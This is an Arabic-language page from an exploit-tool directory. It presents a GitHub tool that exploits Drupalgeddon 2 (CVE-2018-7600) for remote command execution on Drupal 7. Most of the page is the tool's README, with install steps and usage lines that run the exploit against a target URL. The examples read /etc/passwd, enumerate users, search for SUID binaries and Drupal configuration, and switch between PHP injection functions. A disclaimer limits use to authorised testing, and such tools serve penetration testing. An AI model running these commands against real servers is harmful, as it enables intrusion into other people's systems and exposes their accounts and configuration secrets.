Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

针对 CVE-2018-7600 (Drupalgeddon 2) 的 Python 漏洞利用,可在 Drupal 7 上实现远程代码执行,支持多种注入方法以及针对 Linux 和 Windows 的预定义命令。

عرض المستودع
5منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 الوصف

bixi.py هو أداة استغلال للثغرة CVE‑2018‑7600 (Drupalgeddon 2) التي تؤثر على Drupal 7. يتيح تنفيذ الأوامر عن بُعد (RCE) على خوادم Drupal الضعيفة عبر واجهة بديهية وأوامر محددة مسبقًا.


⚠️ إخلاء المسؤولية / تنبيه قانوني

هذا البرنامج مخصص فقط للأغراض التعليمية والبحثية في بيئات خاضعة للتحكم.

  • استخدمه فقط على الأنظمة التي تملكها أو لديك إذن كتابي لاختبارها
  • الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى عقوبات جنائية
  • المؤلف غير مسؤول عن سوء استخدام هذه الأداة
  • التزم دائمًا بقوانين الأمن السيبراني المحلية والدولية

"القوة العظيمة تأتي مع مسؤولية عظيمة"


📋 المميزات

  • ✅ استغلال تلقائي لثغرة CVE‑2018‑7600
  • ✅ أوامر محددة مسبقًا لأنظمة Linux وWindows
  • ✅ طرق حقن متعددة (system, passthru, exec, shell_exec)
  • ✅ واجهة بديهية مع نظام مساعدة
  • ✅ معالجة قوية للأخطاء والمهلات الزمنية
  • ✅ مخرجات منسقة وسهلة القراءة

🚀 التثبيت السريع

1. استنساخ المستودع

git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600

2. تثبيت التبعيات

# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests

# Otras distribuciones
pip3 install requests

3. منح أذونات التنفيذ

chmod +x bixi.py

🎯 الاستخدام الأساسي

عرض المساعدة الكاملة

python3 bixi.py --help

الصيغة العامة

python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]

أمثلة عملية

# Verificar vulnerabilidad
python3 bixi.py http://10.99.99.6/drupal/ test

# Detectar sistema operativo
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows

# Enumerar usuarios
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user

# Información del sistema
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig

# Comandos personalizados
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"

📊 الكلمات المفتاحية المحددة مسبقًا

🐧 Linux

الأمرالوصف
linuxمعلومات النظام
users_linuxسرد المستخدمين
idمعلومات المستخدم/المجموعات
lsسرد الملفات
ifconfigمعلومات الشبكة
find_flagالبحث عن flags

🪟 Windows

الأمرالوصف
windowsمعلومات النظام
net_userسرد المستخدمين
whoami_winمعلومات مفصلة
ipconfigالشبكة
netstat_winالاتصالات
dirسرد الدليل

🔧 اختبار الاختراق

الأمرالوصف
sudoالتحقق من صلاحيات sudo
suidالبحث عن ثنائيات SUID
net_localgroupالمجموعات المحلية
drupal_configالبحث عن الإعدادات
drupal_versionالحصول على إصدار Drupal

🎨 طرق الحقن

# system (default)
python3 bixi.py http://target/ "whoami" system

# passthru
python3 bixi.py http://target/ "whoami" passthru

# exec
python3 bixi.py http://target/ "whoami" exec

# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec

🏗️ هيكل المشروع

drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│   ├── linux_commands.txt
│   └── windows_commands.txt
└── screenshots/
    ├── help_screen.png
    └── exploit_success.png

🔧 الإعدادات المتقدمة

البروكسي (اختياري)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

المهلة الزمنية

تعديل القيمة الافتراضية (15 ثانية):

timeout=15

إضافة أوامر جديدة

عدّل القاموس commands في get_command_for_keyword()


🐛 استكشاف الأخطاء وإصلاحها

خطأ: No module named 'requests'

pip3 install requests

خطأ: Connection refused

# Verificar conectividad
ping TARGET_IP

# Verificar ruta Drupal
curl http://TARGET_IP/drupal/
تنزيل الأداة